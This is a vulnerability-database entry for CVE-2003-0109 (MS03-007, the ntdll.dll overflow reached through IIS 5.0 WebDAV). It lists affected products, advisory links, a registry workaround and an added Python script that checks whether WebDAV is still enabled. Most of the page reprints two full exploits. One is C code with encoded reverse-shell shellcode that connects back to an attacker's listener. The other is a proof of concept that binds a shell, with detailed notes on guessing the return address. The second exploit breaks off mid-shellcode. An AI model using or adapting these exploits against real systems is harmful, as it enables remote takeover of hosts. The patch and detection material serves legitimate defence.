CVE-2003-0109
CVSS 7.5
Published: 2003-03-31 00:00:00
Revised: 2016-10-17 22:29:38

[Original] Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0.


[CNNVD] Microsoft Windows 2000 WebDAV Remote Buffer Overflow Vulnerability (MS03-007) (CNNVD-200303-079)

        
Microsoft IIS 5.0 (Internet Information Server 5) is the web server bundled with Microsoft Windows 2000 and includes HTTP service functionality. IIS 5 supports WebDAV by default, which lets users store files remotely over HTTP. For an ordinary HTTP server, however, this feature is not required.
The WebDAV component in IIS 5.0 does not sufficiently check data passed to certain system components. A remote attacker can exploit this to mount a buffer overflow attack against WebDAV and may execute arbitrary instructions on the system with the privileges of the web process.
IIS 5.0's WebDAV uses functions in ntdll.dll that contain a buffer overflow vulnerability, and a malformed WebDAV request can trigger the overflow. Successful exploitation yields LocalSystem privileges, which means an intruder can gain complete control of the host.
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000::sp3:professional  (Microsoft Windows 2000 Professional SP3)
cpe:/o:microsoft:windows_2000_terminal_services::sp2
cpe:/o:microsoft:windows_2000::sp1:professional  (Microsoft Windows 2000 Professional SP1)
cpe:/o:microsoft:windows_2000::sp2:professional  (Microsoft Windows 2000 Professional SP2)
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_2000::sp3:advanced_server  (Microsoft Windows 2000 Advanced Server SP3)
cpe:/o:microsoft:windows_2000::sp2:advanced_server  (Microsoft Windows 2000 Advanced Server SP2)
cpe:/o:microsoft:windows_2000::sp1:advanced_server  (Microsoft Windows 2000 Advanced Server SP1)
cpe:/o:microsoft:windows_2000::sp1:server  (Microsoft Windows 2000 Server SP1)
cpe:/o:microsoft:windows_2000::sp3:server  (Microsoft Windows 2000 Server SP3)
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000_terminal_services::sp3
cpe:/o:microsoft:windows_2000::sp3:datacenter_server  (Microsoft Windows 2000 Datacenter Server SP3)
cpe:/o:microsoft:windows_2000_terminal_services::sp1
cpe:/o:microsoft:windows_2000::sp1:datacenter_server  (Microsoft Windows 2000 Datacenter Server SP1)
cpe:/o:microsoft:windows_2000::sp2:datacenter_server  (Microsoft Windows 2000 Datacenter Server SP2)
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000_terminal_services
cpe:/o:microsoft:windows_2000::sp2:server  (Microsoft Windows 2000 Server SP2)

- OVAL (technical details for detection)

oval:org.mitre.oval:def:109  Windows ntdll.dll Buffer Overflow
*OVAL describes in detail how to detect this vulnerability; the related OVAL definition contains further technical detail on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0109
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0109
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-079
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=104826476427372&w=2
(UNKNOWN)  BUGTRAQ  20030321 New attack vectors and a vulnerability dissection of MS03-007
http://marc.info/?l=bugtraq&m=104861839130254&w=2
(UNKNOWN)  BUGTRAQ  20030325 IIS 5.0 WebDAV -Proof of concept-. Fully documented.
http://marc.info/?l=bugtraq&m=104869293619064&w=2
(UNKNOWN)  BUGTRAQ  20030326 WebDAV exploit: using wide character decoder scheme
http://marc.info/?l=bugtraq&m=104887148323552&w=2
(UNKNOWN)  BUGTRAQ  20030328 Fate Research Labs Presents: Analysis of the NTDLL.DLL Exploit
http://marc.info/?l=bugtraq&m=105768156625699&w=2
(UNKNOWN)  BUGTRAQ  20030708 WDAV exploit without netcat and with pretty magic number
http://marc.info/?l=ntbugtraq&m=104826785731151&w=2
(UNKNOWN)  NTBUGTRAQ  20030321 New attack vectors and a vulnerability dissection of MS03-007
http://microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en
(UNKNOWN)  CONFIRM  http://microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en
http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q815021
(UNKNOWN)  MSKB  Q815021
http://www.cert.org/advisories/CA-2003-09.html
(VENDOR_ADVISORY)  CERT  CA-2003-09
http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=22029
(VENDOR_ADVISORY)  ISS  20030317 Microsoft IIS WebDAV Remote Compromise Vulnerability
http://www.iss.net/security_center/static/11533.php
(VENDOR_ADVISORY)  XF  http-webdav-long-request(11533)
http://www.kb.cert.org/vuls/id/117394
(UNKNOWN)  CERT-VN  VU#117394
http://www.microsoft.com/technet/security/bulletin/ms03-007.asp
(VENDOR_ADVISORY)  MS  MS03-007
http://www.nextgenss.com/papers/ms03-007-ntdll.pdf
(UNKNOWN)  MISC  http://www.nextgenss.com/papers/ms03-007-ntdll.pdf
http://www.securityfocus.com/bid/7116
(VENDOR_ADVISORY)  BID  7116

- Vulnerability information

Microsoft Windows 2000 WebDAV Remote Buffer Overflow Vulnerability (MS03-007)
High severity  Boundary condition error
2003-03-31 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Using Microsoft's IIS Lockdown tool may prevent this vulnerability from being exploited.
* WebDAV on IIS 5.0 web servers is implemented by Httpext.dll, which is installed by default. Simply altering Httpext.dll does not fix the vulnerability, because Windows File Protection (WFP) in Windows 2000 prevents important system files from being damaged or deleted. To disable WebDAV completely, including PUT and DELETE requests, make the following registry change:
1. Start the Registry Editor (Regedt32.exe).
2. Locate the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters

3. On the Edit menu, click Add Value, and add the following value:
Value name: DisableWebDAV
Data type: DWORD
Value data: 1
Vendor patch:
Microsoft
---------
Microsoft has released a security bulletin (MS03-007) and a corresponding patch:
MS03-007: Unchecked Buffer In Windows Component Could Cause Web Server Compromise (815021)
Link:
http://www.microsoft.com/technet/security/bulletin/MS03-007.asp

Patch download:
Microsoft Windows 2000:

http://microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en
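The registry workaround above only helps if IIS actually stops handing WebDAV verbs to Httpext.dll after the WWW service is restarted, so it is worth checking from the outside. The script below is an added example, not part of the CNNVD entry, of MS03-007 or of the IIS Lockdown tool. It reuses the check that the first exploit listing on this page performs in its test_host() function: send a bodiless "SEARCH /" request and treat a "411 Length Required" status as "WebDAV is answering", anything else as "WebDAV not detected". The function names, the label strings and the read timeout are this example's own choices.

```python
"""Verify the DisableWebDAV workaround from the network side.

Added example; not from the CNNVD entry or from Microsoft. After setting
DisableWebDAV=1 under the W3SVC\\Parameters key and restarting the WWW
service, run probe() against the server. The rule applied is the one the
page's test_host() uses: a bodiless SEARCH answered with 411 means WebDAV
still handled the request.
"""
import socket
from typing import Optional, Tuple


def build_probe(host: str, method: str = "SEARCH") -> bytes:
    """Same shape as the page's test_host() request: a WebDAV verb, no body."""
    return (f"{method} / HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Connection: close\r\n\r\n").encode("ascii")


def parse_status(response: bytes) -> Optional[Tuple[str, int, str]]:
    """Split the status line into (version, code, reason); None if not HTTP."""
    line = response.split(b"\r\n", 1)[0].decode("latin-1", "replace")
    parts = line.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        return None
    reason = parts[2] if len(parts) == 3 else ""
    return parts[0], int(parts[1]), reason


def classify(response: bytes) -> str:
    """Apply the page's rule: 411 to a bodiless SEARCH means WebDAV handled it."""
    status = parse_status(response)
    if status is None:
        return "no-http-response"
    code = status[1]
    if code == 411:
        return "webdav-enabled"
    # Any other status (405, 501, 404, ...) is what test_host() reports as NOT FOUND.
    return f"webdav-not-detected-{code}"


def probe(host: str, port: int = 80, timeout: float = 5.0) -> str:
    """Connect, send the probe, read until close or timeout, classify the reply."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe(host))
        while True:
            try:
                data = sock.recv(4096)
            except socket.timeout:
                break           # server kept the connection open; use what we have
            if not data:
                break
            chunks.append(data)
    return classify(b"".join(chunks))


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "localhost"
    print(f"{target}: {probe(target)}")
```

Run it once before the change (expect "webdav-enabled") and once after the service restart; if the second run still reports 411, the value was added under the wrong key or the service was not restarted.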

- Vulnerability information (1)

MS Windows WebDAV (ntdll.dll) Remote Exploit (EDBID:1)
windows remote
2003-03-23 Verified
80 kralor
N/A
/*******************************************************************/
/* [Crpt] ntdll.dll exploit through WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad = 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
/* on all the others servers it was at 2,3,4, etc..sometimes */
/* you can have the force with you, and get the shell in 1 try */
/* sometimes you need to pad more than 10 times ;) */
/* the shellcode was coded by myself, it is SEH + ScanMem to */
/* find the famous offsets (GetProcAddress).. */
/* */
/*******************************************************************/


#include <winsock.h>
#include <windows.h>
#include <stdio.h>

#pragma comment (lib,"ws2_32")

char shellc0de[] =
"\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
"\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
"\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
"\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
"\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
"\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
"\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
"\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
"\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
"\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
"\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
"\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
"\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
"\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
"\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
"\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
"\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
"\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
"\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
"\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
"\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
"\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
"\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
"\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
"\xff\xd0"
"CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
"connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
"cmd" // don't change anything..
"\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
"\x00\x00\xe8\x77"
"\x00\x00\xf0\x77"
"\x00\x00\xe4\x77"
"\x00\x88\x3e\x04" // win2k3
"\x00\x00\xf7\xbf" // win9x =P
"\xff\xff\xff\xff";

int test_host(char *host)
{
char search[100]="";
int sock;
struct hostent *heh;
struct sockaddr_in hmm;
char buf[100] ="";

if(strlen(host)>60) {
printf("error: victim host too long.\r\n");
return 1;
}

if ((heh = gethostbyname(host))==0){
printf("error: can't resolve '%s'",host);
return 1;
}

sprintf(search,"SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n",host);
hmm.sin_port = htons(80);
hmm.sin_family = AF_INET;
hmm.sin_addr = *((struct in_addr *)heh->h_addr);

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return 1;
}

printf("Checking WebDav on '%s' ... ",host);

if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){
printf("CONNECTING_ERROR\r\n");
return 1;
}
send(sock,search,strlen(search),0);
recv(sock,buf,sizeof(buf),0);
if(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')
return 0;
printf("NOT FOUND\r\n");
return 1;
}

void help(char *program)
{
printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n",program);
return;
}

void banner(void)
{
printf("\r\n\t [Crpt] ntdll.dll exploit through WebDAV by kralor [Crpt]\r\n");
printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}

void main(int argc, char *argv[])
{
WSADATA wsaData;
unsigned short port=0;
char *port_to_shell="", *ip1="", data[50]="";
unsigned int i,j;
unsigned int ip = 0 ;
int s, PAD=0x10;
struct hostent *he;
struct sockaddr_in crpt;
char buffer[65536] ="";
char request[80000]; // huuuh, what a mess! :)
char content[] =
"<?xml version=\"1.0\"?>\r\n"
"<g:searchrequest xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\n"
"Select \"DAV:displayname\" from scope()\r\n"
"</g:sql>\r\n"
"</g:searchrequest>\r\n";

banner();
if((argc<4)||(argc>5)) {
help(argv[0]);
return;
}

if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error starting winsock..");
return;
}

if(test_host(argv[1]))
return;

if(argc==5)
PAD+=atoi(argv[4]);

printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n",PAD,PAD);

ip = inet_addr(argv[2]); ip1 = (char*)&ip;

shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];
shellc0de[451]=ip1[3];

port = htons(atoi(argv[3]));
port_to_shell = (char *) &port;
shellc0de[446]=port_to_shell[0];
shellc0de[447]=port_to_shell[1];

// we xor the shellcode [xored by 0x95 to avoid bad chars]
__asm {
lea eax, shellc0de
add eax, 0x34
xor ecx, ecx
mov cx, 0x1b0
wah:
xor byte ptr[eax], 0x95
inc eax
loop wah
}

if ((he = gethostbyname(argv[1]))==0){
printf("error: can't resolve '%s'",argv[1]);
return;
}

crpt.sin_port = htons(80);
crpt.sin_family = AF_INET;
crpt.sin_addr = *((struct in_addr *)he->h_addr);

if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return;
}

printf("Connecting... ");

if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){
printf("ERROR\r\n");
return;
}
// No Operation.
for(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);
// fill the buffer with the shellcode
for(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);
// well..it is not necessary..
for(i=0;i<2500;buffer[i]=PAD,i++);

/* we can simply put our ret in this 2 offsets.. */
//buffer[2086]=PAD;
//buffer[2085]=PAD;

buffer[sizeof(buffer)]=0x00;
memset(request,0,sizeof(request));
memset(data,0,sizeof(data));
sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
printf("CONNECTED\r\nSending evil request... ");
send(s,request,strlen(request),0);
send(s,content,strlen(content),0);
printf("SENT\r\n");
recv(s,data,sizeof(data),0);
if(data[0]!=0x00) {
printf("Server seems to be patched.\r\n");
printf("data: %s\r\n",data);
} else
printf("Now if you are lucky you will get a shell.\r\n");
closesocket(s);
return;
}

// milw0rm.com [2003-03-23]
		

- Vulnerability information (2)

MS Windows WebDAV Remote PoC Exploit (EDBID:2)
windows remote
2003-03-24 Verified
80 RoMaNSoFt
N/A
/*************************************/
/* IIS 5.0 WebDAV -Proof of concept- */
/* [ Bug: CAN-2003-0109 ] */
/* By Roman Medina-Heigl Hernandez */
/* aka RoMaNSoFt <roman@rs-labs.com> */
/* Madrid, 23.Mar.2003 */
/* ================================= */
/* Public release. Version 1. */
/* --------------------------------- */
/*************************************/
/* ====================================================================
* --[ READ ME ]
* 
* This exploit is mainly a proof of concept of the recently discovered ntdll.dll bug (which may be
* exploited in many other programs, not necessarily IIS). Practical exploitation is not as easy as
* expected due to difficult RET guessing mixed with possible IIS crashes (which makes RET brute
* forcing a tedious work). The shellcode included here will bind a cmd.exe shell to a given port
* at the victim machine so it could be problematic if that machine is protected behind a firewall.
* For all these reasons, the scope of this code is limited and mainly intended for educational
* purposes. I am not responsible of possible damages created by the use of this exploit code.
* 
* The program sends a HTTP request like this:
* 
* SEARCH /[nop] [ret][ret][ret] ... [ret] [nop][nop][nop][nop][nop] ... [nop] [jmpcode] HTTP/1.1
* {HTTP headers here}
* {HTTP body with webDAV content}
* 0x01 [shellcode]
* 
* IIS converts the first ascii string ([nop]...[jmpcode]) to Unicode using UTF-16 encoding (for
* instance, 0x41 becomes 0x41 0x00, i.e. an extra 0x00 byte is added) and it is the resultant
* Unicode string the one producing the overflow. So at first glance, we cannot include code here
* (more on this later) because it would get corrupted by 0x00 (and other) inserted bytes. Not at
* least using the common method. Another problem that we will have to live with is our RET value
* being padded with null bytes, so if we use 0xabcd in our string, the real RET value (i.e. the
* one EIP will be overwritten with) would be 0x00ab00cd. This is an important restriction.
* 
* We have two alternatives:
*
* 1) The easy one: find any occurrences of our ascii string (i.e. before it gets converted to
* the Unicode form) in process memory. Problem: normally we should find it by debugging the
* vulnerable application and then hardcode the found address (which will be the RET address)
* in our exploit code. This RET address is variable, even for the same version of OS and app
* (I mean, different instances of the same application in the same machine could make the
* guessed RET address invalid at different moments). Now add the restriction of RET value
* padded with null-bytes. Anyway, the main advantage of this method is that we will not have
* to deal with 0x00-padded shellcode.
* 
* 2) The not so-easy one: you could insert an encoded shellcode in such a way that when the app
* expands the ascii string (with the encoded shellcode) to Unicode, a valid shellcode is
* automagically placed into memory. Please, refer to Chris Anley's "venetian exploit" paper
* to read more about this. Dave Aitel also has a good paper about this technique and indeed
* he released code written in Python to encode shellcode (I'm wondering if he will release a
* working tool for that purpose, since the actual code was released as part of a commercial
* product, so it cannot be run without buying the whole product, despite the module itself
* being free!). Problem: it is not so easy as the first method ;-) Advantage: when the over-
* flow happens, some registers may point to our Unicoded string (where our Unicoded-shellcode
* lives in), so we don't need to guess the address where shellcode will be placed and the
* chance of a successful exploitation is greatly improved. For instance, in this case, when
* IIS is overflowed, ECX register points to the Unicode string. The idea is then fill in
* RET value with the fixed address of code like "call %ecx". This code may be contained in
* any previously-loaded library, for example).
* 
* Well, guess it... yes... I chose the easy method :-) Perhaps I will rewrite the exploit
* using method 2, but I cannot promise that.
* 
* Let's see another problem of the method 1 (which I have used). Not all Unicode conversions
* result in a 0x00 byte being added. This is true for ascii characters lower or equal to 0x7f
* (except for some few special characters, I'm not sure). But our shellcode will have bytes
* greater than 0x7f value. So we don't know the exact length of the Unicoded-string containing
* our shellcode (some ascii chars will expand to more than 2 bytes, I think). As a result,
* sometimes the exploit may not work, because no exact length is matched. For instance, if you
* carry out experiments on this issue, you could see that IIS crashes (overflow occurs) when
* entering a query like SEARCH /AAAA...AAA HTTP/1.1, with 65535 A's. Same happens with 65536.
* But with different values seems NOT to work. So matching the exact length is important here!
* 
* What I have done, it is to include a little "jumpcode" instead of the shellcode itself. The
* jumpcode is placed into the "critical" place and has a fixed length, so our string has always
* a fixed length, too. The "variable" part (the shellcode) is placed at the end of the HTTP
* request (so you can insert your own shellcode and remove the one I'm using here, with no apparent
* problem). To be precise, the end of the request will be: 0x01 [shellcode]. The 0x01 byte marks
* the beginning of the shellcode and it is used by the jumpcode to find the address where shell-
* code begins and jump into it. It is not possible to hardcode a relative jump, because HTTP
* headers have a variable length (think about the "Host:" header and you will understand what
* I'm saying). Well, really, the exploit could have calculated the relative jump itself (other
* problems arise like null-bytes possibly contained in the offset field) but I have preferred to
* use the 0x01 trick. It's my exploit, it's my choice :-)
* 
* After launching the exploit, several things may happen:
* - the exploit is successful. You can connect to the bound port of victim machine and get a
* shell. Great. Remember that when you issue an "exit" command in the shell prompt, the pro-
* cess will be terminated. This implies that IIS could die.
* - exploit returns a "server not vulnerable" response. Really, the server may not be vulnerable
* or perhaps the SEARCH method used by the exploit is not permitted (the bug can still be
* exploited via GET, probably) or webDAV is disabled at all.
* - exploit did not get success (which is not strange, since it is not easy to guess RET value)
* but the server is vulnerable. IIS will probably not survive: a "net start w3svc" could be
* needed in the victim machine, in order to restart the WWW service.
* 
* The following log shows a correct exploitation:
* 
* roman@goliat:~/iis5webdav> gcc -o rs_iis rs_iis.c
* roman@goliat:~/iis5webdav> ./rs_iis roman 
* [*] Resolving hostname ...
* [*] Attacking port 80 at roman (EIP = 0x00480004)...
* [*] Now open another console/shell and try to connect (telnet) to victim port 31337...
* 
* roman@goliat:~/iis5webdav> telnet roman 31337
* Trying 192.168.0.247...
* Connected to roman.
* Escape character is '^]'.
* Microsoft Windows 2000 [Versi¢n 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
* 
* C:\WINNT\system32>
* 
* 
* I am not going to show logs for the faulty cases. I'm pretty sure you will see them very
* soon :-) But yes, the exploit works, perhaps a little fine-tuning may be required, though.
* So please, do NOT contact me telling that the exploit doesn't work or things like that. It
* worked for me and it will work for you, if you're not a script-kiddie. Try to attach to the
* IIS process (inetinfo.exe) with the help of a debugger (OllyDbg is my favourite) on the
* victim machine and then launch the exploit against it. Debugger will break when the first
* exception is produced. Now place a breakpoint in 0x00ab00cd (being 0xabcd the not-unicoded
* RET value) and resume execution until you reach that point. Finally, it's time to search
* the memory looking for our shellcode. It is nearly impossible (very low chance) that our
* shellcode is found at any 0x00**00**-form address (needed to bypass the RET restriction
* imposed by Unicode conversion) but no problem: you have a lot of NOPs before the shellcode
* where you could point to. If EIP is overwritten with the address of such a NOP, program flow
* will finish reaching our shellcode. Note also that among the two bytes of RET that we have some
* kind of control, the more important is the first one, i.e. the more significant. In other
* words, interesting RET values to try are: 0x0104, 0x0204, 0x0304, 0x0404, 0x0504, ...,
* and so on, till 0xff04. As you may have noticed, the last byte (0x04) is never changed because
* its weight is minimal (256 between aprox. 65000 NOP's is not appreciable).
* 
* 
* My best wishes,
* --Roman
* 
* ===================================== --[ EOT ]-- ====================
*/


#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

// Change to fit your need
#define RET 0x4804 // EIP = 0x00480004
#define LOADLIBRARYA 0x0100107c
#define GETPROCADDRESS 0x01001034

// Don't change this
#define PORT_OFFSET 1052
#define LOADL_OFFSET 798
#define GETPROC_OFFSET 815
#define NOP 0x90
#define MAXBUF 100000


/*
* LoadLibraryA IT Address := 0100107C
* GetProcAddress IT Address := 01001034
*/

unsigned char shellcode[] = // Deepzone shellcode
"\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c"
"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"
"\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99"
"\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14"
"\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b"
"\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9"
"\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3"
"\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99"
"\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99"
"\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9"
"\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9"
"\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c"
"\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc"
"\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9"
"\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9"
"\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c"
"\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99"
"\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89"
"\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3"
"\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1"
"\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf"
"\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9"
"\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66"
"\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99"
"\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf"
"\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32"
"\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14"
"\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3"
"\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59"
"\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66"
"\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b"
"\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99"
"\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9"
"\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf"
"\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66"
"\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9"
"\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99"
"\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf"
"\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9"
"\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6"
"\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe"
"\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8"
"\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66"
